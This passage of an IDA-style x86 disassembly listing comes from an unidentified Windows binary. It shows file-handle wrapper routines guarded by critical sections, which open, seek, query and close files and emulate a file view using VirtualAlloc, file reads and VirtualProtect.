push [ebp+arg_0]
mov ecx, ds:dword_4A28E4
call sub_49C871
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_49105E
push 0FFFFFFFFh
and [ebp+var_54], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_54]
jmp loc_491205
; ---------------------------------------------------------------------------
loc_49105E: ; CODE XREF: sub_490FBF+84�j
mov eax, [ebp+var_28]
mov eax, [eax]
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov eax, [eax]
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov ecx, [ebp+arg_C]
cmp ecx, [eax+8]
jbe short loc_491086
push 57h
call ds:dword_4A278C ; RtlRestoreLastWin32Error
jmp loc_4911B8
; ---------------------------------------------------------------------------
loc_491086: ; CODE XREF: sub_490FBF+B8�j
cmp [ebp+arg_10], 0
jnz short loc_491098
mov eax, [ebp+var_30]
mov eax, [eax+8]
sub eax, [ebp+arg_C]
mov [ebp+arg_10], eax
loc_491098: ; CODE XREF: sub_490FBF+CB�j
mov eax, [ebp+arg_10]
add eax, [ebp+arg_C]
mov ecx, [ebp+var_30]
cmp eax, [ecx+8]
jbe short loc_4910B3
push 57h
call ds:dword_4A278C ; RtlRestoreLastWin32Error
jmp loc_4911B8
; ---------------------------------------------------------------------------
loc_4910B3: ; CODE XREF: sub_490FBF+E5�j
mov eax, [ebp+arg_4]
mov [ebp+var_58], eax
cmp [ebp+var_58], 0
jbe short loc_4910D7
cmp [ebp+var_58], 2
jbe short loc_4910D0
cmp [ebp+var_58], 0F001Fh
jz short loc_4910D0
jmp short loc_4910D7
; ---------------------------------------------------------------------------
loc_4910D0: ; CODE XREF: sub_490FBF+104�j
; sub_490FBF+10D�j
mov [ebp+var_1C], 4
loc_4910D7: ; CODE XREF: sub_490FBF+FE�j
; sub_490FBF+10F�j
push [ebp+var_1C]
push 1000h
push [ebp+arg_10]
push 0
call ds:dword_4A27A4 ; VirtualAlloc
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_4910F8
jmp loc_4911B8
; ---------------------------------------------------------------------------
loc_4910F8: ; CODE XREF: sub_490FBF+132�j
cmp [ebp+var_1C], 4
jz short loc_491119
lea eax, [ebp+var_38]
push eax
push 4
push [ebp+arg_10]
push [ebp+var_20]
call ds:dword_4A27AC ; VirtualProtect
test eax, eax
jnz short loc_491119
jmp loc_4911B8
; ---------------------------------------------------------------------------
loc_491119: ; CODE XREF: sub_490FBF+13D�j
; sub_490FBF+153�j
push 0
push 0
push [ebp+arg_C]
push [ebp+arg_0]
call sub_491421
and [ebp+var_34], 0
loc_49112C: ; CODE XREF: sub_490FBF+1B4�j
mov eax, [ebp+var_34]
cmp eax, [ebp+arg_10]
jnb short loc_491175
and [ebp+var_40], 0
lea eax, [ebp+var_3C]
push eax
push 0
lea eax, [ebp+var_40]
push eax
mov eax, [ebp+arg_10]
sub eax, [ebp+var_34]
push eax
mov eax, [ebp+var_20]
add eax, [ebp+var_34]
push eax
push [ebp+arg_0]
call sub_492177
test eax, eax
jz short loc_491168
cmp [ebp+var_3C], 0
jz short loc_491168
cmp [ebp+var_40], 0
jnz short loc_49116A
loc_491168: ; CODE XREF: sub_490FBF+19B�j
; sub_490FBF+1A1�j
jmp short loc_4911B8
; ---------------------------------------------------------------------------
loc_49116A: ; CODE XREF: sub_490FBF+1A7�j
mov eax, [ebp+var_34]
add eax, [ebp+var_40]
mov [ebp+var_34], eax
jmp short loc_49112C
; ---------------------------------------------------------------------------
loc_491175: ; CODE XREF: sub_490FBF+173�j
cmp [ebp+var_1C], 4
jz short loc_491194
lea eax, [ebp+var_44]
push eax
push [ebp+var_1C]
push [ebp+arg_10]
push [ebp+var_20]
call ds:dword_4A27AC ; VirtualProtect
test eax, eax
jnz short loc_491194
jmp short loc_4911B8
; ---------------------------------------------------------------------------
loc_491194: ; CODE XREF: sub_490FBF+1BA�j
; sub_490FBF+1D1�j
push [ebp+var_2C]
push [ebp+var_20]
mov ecx, ds:dword_4A28E0
call sub_48D000
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_20]
mov [eax], ecx
and [ebp+var_20], 0
mov [ebp+var_24], 1
loc_4911B8: ; CODE XREF: sub_490FBF+C2�j
; sub_490FBF+EF�j ...
push 0FFFFFFFFh
mov [ebp+var_5C], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_5C]
jmp short loc_491205
; ---------------------------------------------------------------------------
loc_4911D1: ; DATA XREF: _5:0049F350�o
mov eax, ds:dword_4A28E4
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jz short loc_4911EC
mov eax, [ebp+var_50]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
loc_4911EC: ; CODE XREF: sub_490FBF+21E�j
cmp [ebp+var_20], 0
jz short locret_491202
push 8000h
push 0
push [ebp+var_20]
call ds:dword_4A27A8 ; VirtualFree
locret_491202: ; CODE XREF: sub_490FBF+231�j
retn
; ---------------------------------------------------------------------------
loc_491203: ; CODE XREF: sub_490FBF+65�j
xor eax, eax
loc_491205: ; CODE XREF: sub_490FBF+9A�j
; sub_490FBF+210�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_490FBF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_491216 proc near ; CODE XREF: sub_49C4A4+11�p
; sub_49C4E0+11�p
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00491333 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F358
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
mov eax, ds:dword_4A28E4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_491262
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_491266
; ---------------------------------------------------------------------------
loc_491262: ; CODE XREF: sub_491216+37�j
and [ebp+var_2C], 0
loc_491266: ; CODE XREF: sub_491216+4A�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_491333
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4A28E4
call sub_49C871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_49130C
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_1C]
mov eax, [eax]
mov eax, [eax+0Ch]
push dword ptr [eax+0Ch]
call ds:dword_4A26A8 ; CreateFileA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jz short loc_4912F3
push 10h
call sub_49935A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
mov esi, [ebp+var_1C]
mov edi, [ebp+var_20]
movsd
movsd
movsd
movsd
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
mov ecx, [ecx]
mov [eax+8], ecx
push [ebp+var_20]
mov eax, [ebp+arg_4]
push dword ptr [eax]
mov ecx, ds:dword_4A28E4
call sub_49C98E
loc_4912F3: ; CODE XREF: sub_491216+A2�j
push 0FFFFFFFFh
mov [ebp+var_34], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_34]
jmp short loc_491335
; ---------------------------------------------------------------------------
loc_49130C: ; CODE XREF: sub_491216+75�j
or [ebp+var_4], 0FFFFFFFFh
call sub_491317
jmp short loc_491333
sub_491216 endp
; =============== S U B R O U T I N E =======================================
sub_491317 proc near ; CODE XREF: sub_491216+FA�p
; DATA XREF: _5:0049F360�o
mov eax, ds:dword_4A28E4
mov [ebp-30h], eax
cmp dword ptr [ebp-30h], 0
jz short locret_491332
mov eax, [ebp-30h]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_491332: ; CODE XREF: sub_491317+C�j
retn
sub_491317 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_491216
loc_491333: ; CODE XREF: sub_491216+56�j
; sub_491216+FF�j
xor eax, eax
loc_491335: ; CODE XREF: sub_491216+F4�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_491216
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_491346 proc near ; CODE XREF: sub_48D3F3+17�p
; sub_490036+39�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_49253F
test eax, eax
jz loc_49141B
movzx eax, [ebp+var_C]
test eax, eax
jnz loc_49141B
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_8], eax
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
push dword ptr [eax+0Ch]
call ds:dword_4A26A8 ; CreateFileA
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_491416
push 0
push 0
mov eax, [ebp+var_8]
push dword ptr [eax+4]
mov eax, [ebp+arg_C]
push dword ptr [eax]
call ds:dword_4A2788 ; SetFilePointer
push 10h
call sub_49935A
pop ecx
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov [eax+8], ecx
mov eax, [ebp+var_10]
and dword ptr [eax+4], 0
movzx eax, [ebp+arg_10]
neg eax
sbb eax, eax
and eax, 0C0000000h
add eax, 40000000h
mov ecx, [ebp+var_10]
mov [ecx+0Ch], eax
push [ebp+var_10]
mov eax, [ebp+arg_C]
push dword ptr [eax]
mov ecx, ds:dword_4A28E4
call sub_48D000
loc_491416: ; CODE XREF: sub_491346+63�j
push 1
pop eax
jmp short locret_49141D
; ---------------------------------------------------------------------------
loc_49141B: ; CODE XREF: sub_491346+20�j
; sub_491346+2C�j
xor eax, eax
locret_49141D: ; CODE XREF: sub_491346+D3�j
leave
retn 14h
sub_491346 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_491421 proc near ; CODE XREF: sub_490FBF+164�p
; sub_496BD7+11D�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 0049165F SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F368
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
cmp [ebp+arg_C], 0
jnz short loc_491452
lea eax, [ebp+var_1C]
mov [ebp+arg_C], eax
loc_491452: ; CODE XREF: sub_491421+29�j
mov eax, ds:dword_4A28E4
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_491473
mov eax, [ebp+var_2C]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_30], 1
jmp short loc_491477
; ---------------------------------------------------------------------------
loc_491473: ; CODE XREF: sub_491421+3D�j
and [ebp+var_30], 0
loc_491477: ; CODE XREF: sub_491421+50�j
movzx eax, [ebp+var_30]
test eax, eax
jz loc_49165F
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4A28E4
call sub_49C871
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_491638
mov eax, [ebp+var_24]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_20], eax
mov eax, [ebp+var_24]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz short loc_4914EB
push [ebp+arg_8]
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A2788 ; SetFilePointer
mov ecx, [ebp+arg_C]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_38], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_491661
; ---------------------------------------------------------------------------
loc_4914EB: ; CODE XREF: sub_491421+96�j
mov eax, [ebp+var_24]
mov eax, [eax+4]
mov [ebp+var_28], eax
cmp [ebp+arg_8], 0
jnz short loc_49154D
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
cmp ecx, [eax+8]
jle short loc_49151E
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_491548
; ---------------------------------------------------------------------------
loc_49151E: ; CODE XREF: sub_491421+E2�j
cmp [ebp+arg_4], 0
jge short loc_491537
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_4A278C ; RtlRestoreLastWin32Error
jmp short loc_491548
; ---------------------------------------------------------------------------
loc_491537: ; CODE XREF: sub_491421+101�j
mov eax, [ebp+var_24]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
loc_491548: ; CODE XREF: sub_491421+FB�j
; sub_491421+114�j
jmp loc_49161F
; ---------------------------------------------------------------------------
loc_49154D: ; CODE XREF: sub_491421+D7�j
cmp [ebp+arg_8], 2
jnz short loc_4915AE
cmp [ebp+arg_4], 0
jle short loc_491572
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_4915AC
; ---------------------------------------------------------------------------
loc_491572: ; CODE XREF: sub_491421+136�j
mov eax, [ebp+var_20]
mov eax, [eax+8]
neg eax
cmp [ebp+arg_4], eax
jge short loc_491592
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_4A278C ; RtlRestoreLastWin32Error
jmp short loc_4915AC
; ---------------------------------------------------------------------------
loc_491592: ; CODE XREF: sub_491421+15C�j
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
add ecx, [eax+8]
mov eax, [ebp+var_24]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
loc_4915AC: ; CODE XREF: sub_491421+14F�j
; sub_491421+16F�j
jmp short loc_49161F
; ---------------------------------------------------------------------------
loc_4915AE: ; CODE XREF: sub_491421+130�j
cmp [ebp+arg_8], 1
jnz short loc_491611
mov eax, [ebp+arg_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_20]
cmp eax, [ecx+8]
jle short loc_4915DB
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_49160F
; ---------------------------------------------------------------------------
loc_4915DB: ; CODE XREF: sub_491421+19F�j
mov eax, [ebp+var_28]
add eax, [ebp+arg_4]
test eax, eax
jge short loc_4915F8
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_4A278C ; RtlRestoreLastWin32Error
jmp short loc_49160F
; ---------------------------------------------------------------------------
loc_4915F8: ; CODE XREF: sub_491421+1C2�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_24]
mov [ecx+4], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
loc_49160F: ; CODE XREF: sub_491421+1B8�j
; sub_491421+1D5�j
jmp short loc_49161F
; ---------------------------------------------------------------------------
loc_491611: ; CODE XREF: sub_491421+191�j
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 57h
call ds:dword_4A278C ; RtlRestoreLastWin32Error
loc_49161F: ; CODE XREF: sub_491421:loc_491548�j
; sub_491421:loc_4915AC�j ...
push 0FFFFFFFFh
mov [ebp+var_3C], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_491661
; ---------------------------------------------------------------------------
loc_491638: ; CODE XREF: sub_491421+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_491643
jmp short loc_49165F
sub_491421 endp
; =============== S U B R O U T I N E =======================================
sub_491643 proc near ; CODE XREF: sub_491421+21B�p
; DATA XREF: _5:0049F370�o
mov eax, ds:dword_4A28E4
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short locret_49165E
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_49165E: ; CODE XREF: sub_491643+C�j
retn
sub_491643 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_491421
loc_49165F: ; CODE XREF: sub_491421+5C�j
; sub_491421+220�j
xor eax, eax
loc_491661: ; CODE XREF: sub_491421+C5�j
; sub_491421+215�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 10h
; END OF FUNCTION CHUNK FOR sub_491421
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_491672 proc near ; CODE XREF: sub_492CC4+80�p
; sub_496456+58�p ...
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0049172E SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F378
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_4A28E4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4916B8
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4916BC
; ---------------------------------------------------------------------------
loc_4916B8: ; CODE XREF: sub_491672+31�j
and [ebp+var_24], 0
loc_4916BC: ; CODE XREF: sub_491672+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz short loc_49172E
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4A28E4
call sub_49C871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_491707
mov eax, [ebp+var_1C]
mov eax, [eax]
mov eax, [eax]
mov ecx, [ebp+arg_4]
mov eax, [eax+8]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_491730
; ---------------------------------------------------------------------------
loc_491707: ; CODE XREF: sub_491672+6B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_491712
jmp short loc_49172E
sub_491672 endp
; =============== S U B R O U T I N E =======================================
sub_491712 proc near ; CODE XREF: sub_491672+99�p
; DATA XREF: _5:0049F380�o
mov eax, ds:dword_4A28E4
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_49172D
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_49172D: ; CODE XREF: sub_491712+C�j
retn
sub_491712 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_491672
loc_49172E: ; CODE XREF: sub_491672+50�j
; sub_491672+9E�j
xor eax, eax
loc_491730: ; CODE XREF: sub_491672+93�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_491672
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_491741 proc near ; CODE XREF: sub_48D3F3+58�p
; sub_49012B+22�p ...
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F388
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jnz short loc_491772
lea eax, [ebp+var_1C]
mov [ebp+arg_4], eax
loc_491772: ; CODE XREF: sub_491741+29�j
mov eax, ds:dword_4A28E4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_491793
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_491797
; ---------------------------------------------------------------------------
loc_491793: ; CODE XREF: sub_491741+3D�j
and [ebp+var_2C], 0
loc_491797: ; CODE XREF: sub_491741+50�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_491845
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4A28E4
call sub_49C871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_491809
mov eax, [ebp+var_20]
push dword ptr [eax+8]
call ds:dword_4A26A4 ; CloseHandle
push [ebp+arg_0]
mov ecx, ds:dword_4A28E4
call sub_49C8E0
mov eax, [ebp+var_20]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_4993DD
pop ecx
mov eax, [ebp+arg_4]
mov dword ptr [eax], 1
push 0FFFFFFFFh
mov [ebp+var_34], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_34]
jmp short loc_491847
; ---------------------------------------------------------------------------
loc_491809: ; CODE XREF: sub_491741+7B�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_490818
push 0FFFFFFFFh
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp short loc_491847
; ---------------------------------------------------------------------------
loc_491829: ; DATA XREF: _5:0049F390�o
mov eax, ds:dword_4A28E4
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz short locret_491844
mov eax, [ebp+var_30]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_491844: ; CODE XREF: sub_491741+F4�j
retn
; ---------------------------------------------------------------------------
loc_491845: ; CODE XREF: sub_491741+5C�j
xor eax, eax
loc_491847: ; CODE XREF: sub_491741+C6�j
; sub_491741+E6�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_491741 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_491858 proc near ; CODE XREF: sub_49B710+12�p
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0049193D SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F398
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
cmp [ebp+arg_8], 0
jnz short loc_491889
lea eax, [ebp+var_1C]
mov [ebp+arg_8], eax
loc_491889: ; CODE XREF: sub_491858+29�j
mov eax, ds:dword_4A28E4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4918AA
mov eax, [ebp+var_24]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_28], 1
jmp short loc_4918AE
; ---------------------------------------------------------------------------
loc_4918AA: ; CODE XREF: sub_491858+3D�j
and [ebp+var_28], 0
loc_4918AE: ; CODE XREF: sub_491858+50�j
movzx eax, [ebp+var_28]
test eax, eax
jz loc_49193D
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4A28E4
call sub_49C871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_491916
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A26FC ; GetFileInformationByHandle
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_4]
and dword ptr [eax+20h], 0
mov eax, [ebp+var_20]
mov eax, [eax]
mov eax, [eax]
mov ecx, [ebp+arg_4]
mov eax, [eax+8]
mov [ecx+24h], eax
push 0FFFFFFFFh
mov [ebp+var_30], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_49193F
; ---------------------------------------------------------------------------
loc_491916: ; CODE XREF: sub_491858+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_491921
jmp short loc_49193D
sub_491858 endp
; =============== S U B R O U T I N E =======================================
sub_491921 proc near ; CODE XREF: sub_491858+C2�p
; DATA XREF: _5:0049F3A0�o
mov eax, ds:dword_4A28E4
mov [ebp-2Ch], eax
cmp dword ptr [ebp-2Ch], 0
jz short locret_49193C
mov eax, [ebp-2Ch]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_49193C: ; CODE XREF: sub_491921+C�j
retn
sub_491921 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_491858
loc_49193D: ; CODE XREF: sub_491858+5C�j
; sub_491858+C7�j
xor eax, eax
loc_49193F: ; CODE XREF: sub_491858+BC�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_491858
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_491950 proc near ; CODE XREF: sub_49B741+B�p
; sub_49B77D+B�p
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004919FD SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F3A8
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_4A28E4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_491996
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_49199A
; ---------------------------------------------------------------------------
loc_491996: ; CODE XREF: sub_491950+31�j
and [ebp+var_24], 0
loc_49199A: ; CODE XREF: sub_491950+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz short loc_4919FD
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4A28E4
call sub_49C871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4919D6
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4919FF
; ---------------------------------------------------------------------------
loc_4919D6: ; CODE XREF: sub_491950+6B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4919E1
jmp short loc_4919FD
sub_491950 endp
; =============== S U B R O U T I N E =======================================
sub_4919E1 proc near ; CODE XREF: sub_491950+8A�p
; DATA XREF: _5:0049F3B0�o
mov eax, ds:dword_4A28E4
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_4919FC
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_4919FC: ; CODE XREF: sub_4919E1+C�j
retn
sub_4919E1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_491950
loc_4919FD: ; CODE XREF: sub_491950+50�j
; sub_491950+8F�j
xor eax, eax
loc_4919FF: ; CODE XREF: sub_491950+84�j
